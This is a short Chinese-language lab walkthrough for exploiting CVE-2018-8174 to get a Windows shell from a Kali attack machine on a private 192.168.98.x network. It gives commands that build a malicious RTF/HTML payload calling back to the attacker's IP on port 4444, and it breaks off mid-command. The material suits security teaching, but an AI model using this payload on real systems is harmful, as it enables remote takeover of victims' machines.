一、 利用 0DAY 漏洞 CVE-2018-8174 获取windows系统 shell
实验环境:
kali攻击机(192.168.98.30)
window目标机(192.168.98.35)
CVE-2018-8174脚本
实验步骤:
1、xshell上传 CVE-2018-8174 的 EXP 到 Kali
2、解压 CVE-2018-8174 并进入该目录
3、利用EXP生成恶意html文件,并放到/var/www/html,为了让目标机访问
python2 CVE-2018-8174.py -u http://192.168.98.30/exploit.html -o hack.rtf -i 192.168.98.30 -p 4444
cp exploit.html /var/www/htm